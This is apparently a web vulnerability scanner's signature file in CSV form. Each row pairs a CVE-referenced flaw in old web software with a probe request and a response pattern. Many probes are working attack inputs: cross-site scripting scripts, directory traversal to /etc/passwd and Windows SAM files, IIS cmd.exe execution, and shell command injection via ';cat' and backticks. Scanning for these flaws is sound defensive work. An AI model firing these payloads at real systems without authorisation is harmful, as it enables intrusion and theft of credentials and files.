"003262","https://seclists.org/fulldisclosure/2003/Mar/265","4","/sysuser/docmgr/search.stm?query=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS).","","" "003263","CVE-2001-0302","8","/isapi/tstisapi.dll","GET","Pi3web","","","","","The test tstisapi.dll is available and can allow attackers to execute commands remotely.","","" "003264","CVE-2001-0320,CVE-2001-0001","7","@CGIDIRSbb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK","GET","root:","","","","","PHP-Nuke is vulnerable to a remote file retrieval vuln. It should be upgraded to the latest version. CVE-2001-0320","","" "003265","CVE-2001-0320,CVE-2001-0001","7","@NUKEbb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK","GET","root:","","","","","PHP-Nuke is vulnerable to a remote file retrieval vuln. It should be upgraded to the latest version. CVE-2001-0320","","" "003266","CVE-2002-0323","7","/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf","GET","SET CLIENT FILE","","","","","Default scripts can allow arbitrary access to the host.","","" "003267","OSVDB-5325","7","/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf","GET","Source for file","","","","","Novell web server allows any file on the system to viewed through the viewcode.jsp file","","" "003268","CVE-2001-0466","7","@CGIDIRSustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd","GET","root:","","","","","ustorekeeper will display arbitrary files.","","" "003270","CVE-2001-0432","d","/catinfo","GET","200","","","","","May be vulnerable to a buffer overflow. Request '/catinfo?' and add on 2048 of garbage to test.","","" "003271","CVE-2001-1371","a","/soap/servlet/soaprouter","GET","200","","","","","Oracle 9iAS SOAP components allow anonymous users to deploy applications by default.","","" "003272","CVE-2001-0321","7","/opendir.php?/etc/passwd","GET","root:","","","","","This PHP-Nuke CGI allows attackers to read any file on the web server.","","" "003273","CVE-2001-0321","7","/opendir.php?requesturl=/etc/passwd","GET","root:","","","","","This PHP-Nuke CGI allows attackers to read any file on the web server.","","" "003274","CVE-2003-0154","4","/webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS).","","" "003275","CVE-2003-0154","4","@CGIDIRScvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS).","","" "003276","CVE-2003-0154","4","/webtools/bonsai/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS).","","" "003277","CVE-2003-0154","4","/webtools/bonsai/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS).","","" "003278","CVE-2003-0154","4","@CGIDIRScvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS).","","" "003279","CVE-2003-0154","4","@CGIDIRScvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS).","","" "003280","CVE-2003-0153","4","/webtools/bonsai/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS).","","" "003281","CVE-2003-0153","4","/webtools/bonsai/cvslog.cgi?file=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS).","","" "003282","CVE-2003-0153","4","@CGIDIRScvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS).","","" "003283","CVE-2003-0153","4","@CGIDIRScvslog.cgi?file=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS).","","" "003284","CVE-2003-0154","4","/webtools/bonsai/cvsblame.cgi?file=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS).","","" "003285","CVE-2003-0154","4","@CGIDIRScvsblame.cgi?file=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS).","","" "003286","CVE-2003-0154","4","/webtools/bonsai/showcheckins.cgi?person=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS).","","" "003287","CVE-2003-0154","4","@CGIDIRSshowcheckins.cgi?person=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS).","","" "003288","CVE-2002-1453","4","/JUNK(223)<font%20size=50>DEFACED<!--//--","GET","<font size=50>DEFACED<","","","not found","","MyWebServer 1.0.2 is vulnerable to HTML injection. Upgrade to a later version.","","" "003289","CVE-2002-1452","d","/MWS/HandleSearch.html?searchTarget=test&B1=Submit","GET","200","","","","","MyWebServer 1.0.2 may be vulnerable to a buffer overflow (untested). Upgrade to a later version if 990b of searched data crashes the server.","","" "003290","CVE-2001-0561","7","@CGIDIRSa1disp3.cgi?../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers read arbitrary files on the host.","","" "003291","CVE-2001-0561","7","@CGIDIRSa1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers read arbitrary files on the host.","","" "003292","CVE-2001-0561","7","@CGIDIRSa1stats/a1disp3.cgi?../../../../../../../etc/passwd","GET","root:","","","","","Remote file retrieval.","","" "003293","CVE-2001-0561","7","@CGIDIRSa1stats/a1disp4.cgi?../../../../../../../etc/passwd","GET","root:","","","","","Remote file retrieval.","","" "003294","CVE-2001-0333","8","/certsrv/..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug that allows commands to be executed on the system.","","" "003295","CVE-2001-0333","8","/cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug that allows commands to be executed on the system.","","" "003296","CVE-2001-0333","8","/iisadmpwd/..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug that allows commands to be executed on the system.","","" "003297","CVE-2001-0333","8","/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug that allows commands to be executed on the system.","","" "003298","CVE-2001-0333","8","/pbserver/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug that allows commands to be executed on the system.","","" "003299","CVE-2001-0333","8","/rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug that allows commands to be executed on the system.","","" "003300","CVE-2001-0333","8","/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug that allows commands to be executed on the system.","","" "003301","CVE-2001-0333","8","/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver","GET","\[Version\]","","","","","IIS is vulnerable to a double-decode bug that allows commands to be executed on the system.","","" "003302","CVE-2001-0333","8","/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug that allows commands to be executed on the system.","","" "003303","https://www.invicti.com/web-vulnerability-scanner/vulnerabilities/apache-server-info-detected/","3","/server-info","GET","200","Server Information","","","","This gives a lot of Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts.","","" "003304","CVE-2001-1350","4","@CGIDIRSnamazu.cgi","GET","200","","","","","Namazu search engine found. Vulnerable to XSS attacks (fixed 2001-11-25). Attacker could write arbitrary files outside docroot (fixed 2000-01-26).","","" "003306","OSVDB-5709","3","/.nsconfig","GET","200","","","","","Contains authorization information","","" "003307","OSVDB-5709","3","@CGIDIRS.nsconfig","GET","200","","","","","Contains authorization information","","" "003308","CVE-2001-0731","2","/?D=A","GET","[Ii]ndex [Oo]f \\\/","","","","","Apache allows directory listings by requesting.","","" "003309","CVE-2001-0731","2","/?N=D","GET","[Ii]ndex [Oo]f \\\/","","","","","Apache allows directory listings by requesting.","","" "003310","CVE-2001-0731","2","/?S=A","GET","[Ii]ndex [Oo]f \\\/","","","","","Apache allows directory listings by requesting.","","" "003311","CVE-2001-0731","23","/?M=A","GET","[Ii]ndex [Oo]f \\\/","","","","","Apache allows directory listings. Upgrade Apache or disable directory indexing.","","" "003312","CVE-2001-1586","7","/cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fping.exe%20127.0.0.1","GET","Reply from 127\.0\.0\.1","","","","","AnalogX SimpleServer:WWW HTTP vulnerability allows specially formatted strings to perform command execution. Upgrade to version 1.15 or higher.","","" "003313","CVE-2001-1586","7","/cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1","GET","200","","","","","AnalogX SimpleServer:WWW HTTP vulnerability allows specially formatted strings to perform command execution. Upgrade to version 1.15 or higher.","","" "003314","CVE-2001-0821 https://packetstormsecurity.com/files/32406/xmas.txt.html","23","/dc/auth_data/auth_user_file.txt","GET","200","","","","","The DCShop installation allows credit card numbers to be viewed remotely.","","" "003315","CVE-2001-0821 https://packetstormsecurity.com/files/32406/xmas.txt.html","23","/dc/orders/orders.txt","GET","200","","","","","The DCShop installation allows credit card numbers to be viewed remotely.","","" "003318","CVE-2001-0985","8","@CGIDIRSshop.pl/page=;cat%20shop.pl|","GET","\\\/perl","","","","","Shopping Cart (Hassan) allows execution of remote commands.","","" "003319","CVE-2001-1019","7","@CGIDIRSview_item?HTML_FILE=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","sglMerchant allows reading of remote files.","","" "003320","CVE-2001-1446 http://www.securiteam.com/securitynews/5LP0O005FS.html","3","/.FBCIndex","GET","Bud2","","","","","This file on OSX contains the source of the files in the directory.","","" "003321","CVE-2001-0992","7","@CGIDIRSshopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|","GET","root:","","","","","ShopPlus Cart allows arbitrary command execution.","","" "003322","CVE-2001-1014","8","@CGIDIRSeshop.pl/seite=;cat%20eshop.pl|","GET","\\\/perl","","","","","This CGI allows attackers to execute commands on the remote server.","","" "003323","CVE-2002-1453","4","/JUNK(223)<font%20size=50><script>alert(11)</script><!--//--","GET","<script>alert\(11\)<\/script>","","","","","MyWebServer 1.0.2 is vulnerable to Cross Site Scripting (XSS).","","" "003324","CVE-2002-1559","7","@CGIDIRSion-p.exe?page=c:\winnt\repair\sam","GET","200","","","","","Ion-P allows remote file retrieval.","","" "003325","CVE-2002-1559","7","@CGIDIRSion-p?page=../../../../../etc/passwd","GET","root:","","","","","Ion-P allows remote file retrieval.","","" "003326","CVE-2002-0681","7","/..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini","GET","boot loader","","","","","GoAhead Web Server 2.1 is vulnerable to arbitrary file retrieval, upgrade to the latest version.","","" "003327","CVE-2002-0681","7","/..%5C..%5C..%5C..%5C..%5C..%5C/winnt/win.ini","GET","\[windows\]","\[fonts\]","","","","GoAhead Web Server 2.1 is vulnerable to arbitrary file retrieval.","","" "003328","CVE-2003-0169","6","/cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html","GET","200","","","","","HP Instant TopTools GoAhead WebServer hpnst.exe may be vulnerable to a DoS.","","" "003329","CVE-2002-0502","3","/applist.asp","GET","200","","","","","Citrix server may allow remote users to view applications installed without authenticating.","","" "003330","CVE-2002-0301","3","/launch.asp?NFuse_Application=LookOut&NFuse_MIMEExtension=.ica","GET","200","","","","","Citrix server may reveal sensitive information by accessing the 'advanced' tab on the login screen.","","" "003331","https://seclists.org/bugtraq/2003/Nov/226","a","/_layouts/alllibs.htm","GET","200","","","","","Microsoft SharePoint Portal and Team Services vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x.","","" "003332","https://seclists.org/bugtraq/2003/Nov/226","a","/_layouts/settings.htm","GET","200","","","","","Microsoft SharePoint Portal and Team Services vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x.","","" "003333","https://seclists.org/bugtraq/2003/Nov/226","a","/_layouts/userinfo.htm","GET","200","","","","","Microsoft SharePoint Portal and Team Services vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x.","","" "003334","http://freshmeat.net/users/rizen/","8","@CGIDIRSindex.pl","GET","Powered By WebGUI 4\.6\.8","","","","","WebGUI version 4.6.8, according to the documentation, may allow arbitrary code execution.","","" "003335","CVE-2001-1446","3","/.DS_Store","GET","Bud1","","","","","Apache on Mac OSX will serve the .DS_Store file, which contains sensitive information. Configure Apache to ignore this file or upgrade to a newer version.","","" "003336","CVE-2002-1089","3","@CGIDIRSrwcgi60","GET","200","","","","","Oracle report server reveals system information without authorization. See Oracle note 133957.1 - Restricting Access to the Reports Server Environment and Output","","" "003337","CVE-2002-1089","3","@CGIDIRSrwcgi60/showenv","GET","200","","","","","Oracle report server reveals system information without authorization. See Oracle note 133957.1 - Restricting Access to the Reports Server Environment and Output","","" "003338","http://freshmeat.net/users/rizen/","8","@CGIDIRSindex.pl","GET","Powered By WebGUI 4\.6\.9","","","","","WebGUI version 4.6.9 has a \"very obsure [sic] and unlikely security hole\" according to the documentation. .","","" "003339","http://freshmeat.net/users/rizen/","3","@CGIDIRSindex.pl","GET","Powered By WebGUI 4\.5\.0","","","","","WebGUI version 4.5.0 according to the documentation, a user could view collateral data of a wobject if the URL is known.","","" "003340","CVE-1999-0935","8","@CGIDIRSclassifieds/classifieds.cgi","GET","200","","","","","Mike's Classifieds CGI contains a bug that allows arbitrary command execution on the server (untested).","","" "003341","CVE-2000-0432","8","@CGIDIRScalendar/index.cgi","GET","200","","","","","Mike's Calendar CGI contains a bug that allows arbitrary command execution (version 1.4).","","" "003342","CVE-2001-0868","3","/stronghold-info","GET","200","","","","","Redhat Stronghold from versions 2.3 up to 3.0 discloses sensitive information. This gives information on configuration.","","" "003343","CVE-2001-0868","3","/stronghold-status","GET","200","","","","","Redhat Stronghold from versions 2.3 up to 3.0 discloses sensitive information.","","" "003344","CVE-2000-0759","3","/blah-whatever.jsp","GET","JSP file \"","","","","","The Apache Tomcat 3.1 server reveals the web root path when requesting a non-existent JSP file.","","" "003345","CVE-2001-0900","7","/gallery/index.php?include=../../../../../../../../../etc/passwd","GET","root:","","","","","Gallery allows files to be read remotely.","","" "003346","CVE-2001-0900","7","/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd","GET","root:","","","","","Gallery Addon for PHP-Nuke allows files to be read remotely.","","" "003347","CVE-2001-0871","4","@CGIDIRS../../../../../../../../../../WINNT/system32/ipconfig.exe","GET","IP Configuration","","","","","Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands.","","" "003348","CVE-2001-0871","4","@CGIDIRSNUL/../../../../../../../../../WINNT/system32/ipconfig.exe","GET","IP Configuration","","","","","Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands.","","" "003349","CVE-2001-0871","4","@CGIDIRSPRN/../../../../../../../../../WINNT/system32/ipconfig.exe","GET","IP Configuration","","","","","Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands.","","" "003350","CVE-2001-1204","7","/phprocketaddin/?page=../../../../../../../../../../etc/passwd","GET","root:","","","","","The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host.","","" "003351","CVE-2001-1199","4","@CGIDIRSstore/agora.cgi?cart_id=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Agora.cgi is vulnerable to XSS,","","" "003352","CVE-1999-0449","6","/iissamples/exair/howitworks/Code.asp","GET","200","","","","","Scripts within the Exair package on IIS 4 can be used for a DoS against the server.","","" "003353","CVE-1999-0449 MS99-013","6","/iissamples/exair/howitworks/Codebrw1.asp","GET","200","","","","","This is a default IIS script/file which should be removed, it may allow a DoS against the server.","","" "003354","CVE-1999-0736 MS99-013","7","/msadc/Samples/selector/showcode.asp?source=/msadc/Samples/../../../../../../../../../winnt/win.ini","GET","\[fonts\]","","","","","This allows attackers to read arbitrary files on the host.","","" "003355","CVE-2002-2029","4","/pls/dadname/htp.print?cbuf=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Oracle 9iAS is vulnerable to Cross Site Scripting (XSS).","","" "003356","CVE-2002-2029","4","/pls/help/<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Oracle 9iAS is vulnerable to Cross Site Scripting (XSS).","","" "003357","CVE-2002-0562","3","/demo/ojspext/events/globals.jsa","GET","event:application_OnStart","","","","","Oracle 9iAS allows .jsa files to be retrieved, which may contain sensitive information.","","" "003358","CVE-2002-0562","3","/globals.jsa","GET","200","","","","","Oracle globals.jsa file","","" "003359","CVE-2001-1217","7","/pls/sample/admin_/help/..%255cplsql.conf","GET","Directives added for mod-plsql","","","","","Oracle 9iAS allows mod_plsql to perform a directory traversal.","","" "003360","BID-4290 CVE-2002-0568 https://securiteam.com/securitynews/5IP0B203PI/","3","/servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml","GET","On a PRODUCTION system","","","","","Oracle 9iAS configuration file found.","","" "003361","CVE-2002-0325 https://securiteam.com/exploits/5HP0M2A60G/","7","/..%252f..%252f..%252f..%252f..%252f../windows/repair/sam","GET","200","","","Forbidden","","BadBlue server is vulnerable to multiple remote exploits.","","" "003362","CVE-2002-0325 https://securiteam.com/exploits/5HP0M2A60G/","7","/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam","GET","200","","","Forbidden","","BadBlue server is vulnerable to multiple remote exploits.","","" "003363","CVE-2002-0325 https://securiteam.com/exploits/5HP0M2A60G/","7","/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._","GET","200","","","Forbidden","","BadBlue server is vulnerable to multiple remote exploits.","","" "003364","CVE-2002-0325 https://securiteam.com/exploits/5HP0M2A60G/","7","/..%255c..%255c..%255c..%255c..%255c../windows/repair/sam","GET","200","","","Forbidden","","BadBlue server is vulnerable to multiple remote exploits.","","" "003365","CVE-2002-0325 https://securiteam.com/exploits/5HP0M2A60G/","7","/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam","GET","200","","","Forbidden","","BadBlue server is vulnerable to multiple remote exploits.","","" "003366","CVE-2002-0325 https://securiteam.com/exploits/5HP0M2A60G/","7","/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._","GET","200","","","Forbidden","","BadBlue server is vulnerable to multiple remote exploits.","","" "003367","CVE-2002-0325 https://securiteam.com/exploits/5HP0M2A60G/","7","/..%2F..%2F..%2F..%2F..%2F../windows/repair/sam","GET","200","","","Forbidden","","BadBlue server is vulnerable to multiple remote exploits.","","" "003368","CVE-2002-0325 https://securiteam.com/exploits/5HP0M2A60G/","7","/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam","GET","200","","","Forbidden","","BadBlue server is vulnerable to multiple remote exploits.","","" "003369","CVE-2002-0325 https://securiteam.com/exploits/5HP0M2A60G/","7","/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._","GET","200","","","Forbidden","","BadBlue server is vulnerable to multiple remote exploits.","","" "003370","CVE-2002-0306","8","/ans.pl?p=../../../../../usr/bin/id|&blah","GET","uid=","","","","","Avenger's News System allows commands to be issued remotely. The default admin string is 'admin:aaLR8vE.jjhss:root@127\.0\.0\.1', and the password file location 'ans_data/ans.passwd'","","" "003371","CVE-2002-0306","8","/ans/ans.pl?p=../../../../../usr/bin/id|&blah","GET","uid=","","","","","Avenger's News System allows commands to be issued remotely.","","" "003372","CVE-2002-0495 http://www.cgiscript.net/","8","@CGIDIRScsSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`","GET","root:","","","","","csSearch has a major flaw that allows Perl to be executed remotely. Upgrade to a version higher than 2.3.","","" "003373","MS02-018 CVE-2002-0075","3","/?\"><script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","IIS is vulnerable to Cross Site Scripting.","","" "003374","CVE-2002-0075","3","/JUNK(10)abcd.html","GET","\+ displayresult \+","","","","","The IIS 4.0, 5.0 and 5.1 server may be vulnerable to Cross Site Scripting (XSS) in redirect error messages.","","" "003375","CVE-1999-0739","6","/iissamples/exair/howitworks/codebrws.asp","GET","ASP Source code browser","","","","","This is a default IIS script/file that should be removed. It may allow a DoS against the server or a DoS. XF-2383 BID-0167.","","" "003376","CVE-2002-0893","36","/servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa","GET","OBJECT RUNAT=Server","","","","","ServletExec 4.1 ISAPI Java Servlet/JSP Engine for IIS can reveal source code. The server may also be vulnerable to a DoS attack by requesting a long file name ending in .jsp","","" "003377","CVE-2002-0892","36","/servlet/com.newatlanta.servletexec.JSP10Servlet/","GET","The file was not found","","","","","ServletExec 4.1 ISAPI Java Servlet/JSP Engine for IIS discloses the web root. The server may also be vulnerable to a DoS attack by requesting a long file name ending in .jsp","","" "003378","CVE-1999-0739 MS99-013","3","/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp","GET","Path not found","","","","","CodeBrws.asp can be used to determine if a file system path exists or not.","","" "003379","CVE-1999-0739 MS99-013","5","/iissamples/sdk/asp/docs/codebrws.asp","GET","View Active Server Page Source","","","","","IIS 5 comes with an ASP that allows remote code to viewed. All default files in /IISSamples should be removed.","","" "003380","CVE-1999-0739 MS99-013","5","/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp","GET","200","","","","","IIS may be vulnerable to source code viewing via the example CodeBrws.asp file. Remove all default files from the web root.","","" "003381","CVE-2002-0661","7","/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini","GET","\[windows\]","","","","","Apache allows files to be retrieved outside of the web root. Apache should be upgraded to 2.0.40 or above.","","" "003382","CVE-2002-0661","7","/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini","GET","\[fonts\]","","","","","Apache allows files to be retrieved outside of the web root. Apache should be upgraded to 2.0.40 or above.","","" "003383","CVE-2000-0126 MS01-033","7","/iissamples/exair/search/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET","\[fonts\]","","","","","This allows arbitrary files to be retrieved from the server. It may allow a DoS against the server.","","" "003384","CVE-2000-0126 MS01-033","7","/iissamples/exair/search/search.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET","\[fonts\]","","","","","This allows arbitrary files to be retrieved from the server. It may allow a DoS against the server.","","" "003385","CVE-2001-1198","3","/pass_done.php","GET","200","","","","","PY-Membres 4.2 may allow users to execute a query which generates a list of usernames and passwords.","","" "003386","CVE-2001-1198","a","/admin/admin.php?adminpy=1","GET","200","","","","","PY-Membres 4.2 may allow administrator access.","","" "003387","","1","/iishelp/iis/htm/tutorial/redirect.asp","GET","A URL is required","","","","","Possibly unchecked redirect with url= variable.","","" "003388","CVE-2002-2006","3","/servlet/SnoopServlet","GET","Client Information","","","","","JRun, Netware Java Servlet Gateway, or WebSphere default servlet found. All default code should be removed from servers.","","" "003389","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/Citrix/PNAgent/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "003390","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/Citrix/ICAWEB/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "003391","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/IBMWebAS/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "003392","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/IBMWebAS/docs/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "003393","CWE-552","1","/IBMWebAS/apidocs/","GET","IBM WebSphere","","","","","IBM Websphere documentation found.","","" "003394","CWE-552","1","/IBMWebAS/configDocs/","GET","WebSphere Configuration","","","","","IBM Websphere documentation found.","","" "003395","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/IBMWebAS/mbeanDocs/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found. IBM Websphere documentation.","","" "003396","","1","/iishelp/iis/misc/default.asp","GET","Microsoft Internet Information Services","","","","","Default IIS page found.","","" "003397","","1","/Citrix/MetaFrameXP/default/login.asp","GET","MetaFrame XP","","","","","Citrix MetaFrame login.","","" "003398","CWE-552","1","@TOMCATADMINhtml-manager-howto.html","GET","Application Manager","","","","","Tomcat documentation found.","","" "003399","CWE-552","1","@TOMCATADMINmanager-howto.html","GET","Manager App","","","","","Tomcat documentation found.","","" "003400","CWE-552","1","/includes/adovbs.inc","GET","Microsoft ADO","","","","","Default Microsoft file found.","","" "003401","CWE-552","1","/adovbs.inc","GET","Microsoft ADO","","","","","Microsoft default file found.","","" "003402","","13","/fcgi-bin/echo","GET","FastCGI echo","","","","","The FastCGI echo program may reveal system info or lead to other attacks.","","" "003403","","13","/fcgi-bin/echo2","GET","FastCGI echo","","","","","The FastCGI echo2 program may reveal system info or lead to other attacks.","","" "003404","CWE-552","1","/pls/ldc/admin_/","GET","Gateway Configuration","","","","","Oracle Gateway Configuration application.","","" "003405","CWE-552","1","/demo/basic/simple/viewsrc/welcomeuser.jsp.txt","GET","WelcomeUser JSP","","","","","Default demo code found.","","" "003406","","13","/README","GET","OracleJSP","","","","","OracleJSP README file found.","","" "003407","","13","/demo/xml/xmlquery/viewsrc/XMLQuery.jsp.txt","GET","Oracle Corporation","","","","","Default Oracle code found.","","" "003408","","1","/soapdocs/webapps/soap/","GET","Oracle SOAP","","","","","Oracle SOAP application.","","" "003409","","1","/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml","GET","SOAP configuration file","","","","","SOAP server configuration file.","","" "003410","CVE-2005-3685","4","/shopadmin.asp?Password=abc&UserName=\"><script>alert(foo)</script>","GET","<script>alert\(foo\)<\/script>","","","","","VP-ASP Shopping Cart 5.50 shopadmin.asp UserName Variable XSS.","","" "003411","CVE-2005-3388","4","/phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>","GET","<script>alert\(document\.cookie\);<\/script>","","","","","PHP contains a flaw that allows a remote cross site scripting attack.","","" "003412","CVE-2006-1663 CVE-2006-0996","4","/phpinfo.php?cx[]=JUNK(4096)<script>alert(foo)</script>","GET","<script>alert\(foo\)<\/script>","","","","","PHP 5.1.2 and 4.4.2 phpinfo() Function Long Array XSS","","" "003413","CWE-552","1","/j2ee/","GET","200","","","","","j2ee directory found--possibly an Oracle app server directory.","","" "003414","CWE-552","3","@CGIDIRSprintenv.tmp","GET","DOCUMENT_ROOT","","","","","Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed. It may also allow XSS types of attacks. BID-4431.","","" "003415","CWE-552","1","/perl/printenv","GET","DOCUMENT_ROOT","","","","","Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed. It may also allow XSS types of attacks. BID-4431.","","" "003416","CWE-552","3","/perl-status","GET","Embedded Perl","","","","","Perl status page found. This may reveal details about the Perl installation and operating system.","","" "003417","CWE-552","13","/WebCacheDemo.html","GET","200","","","","","Oracle WebCache Demo","","" "003418","CWE-552","13","/webcache/","GET","200","","","","","Oracle WebCache Demo","","" "003419","CWE-552","13","/webcache/webcache.xml","GET","200","","","","","Oracle WebCache Demo","","" "003420","CWE-552","13","/bmp/","GET","200","","","","","SQLJ Demo Application","","" 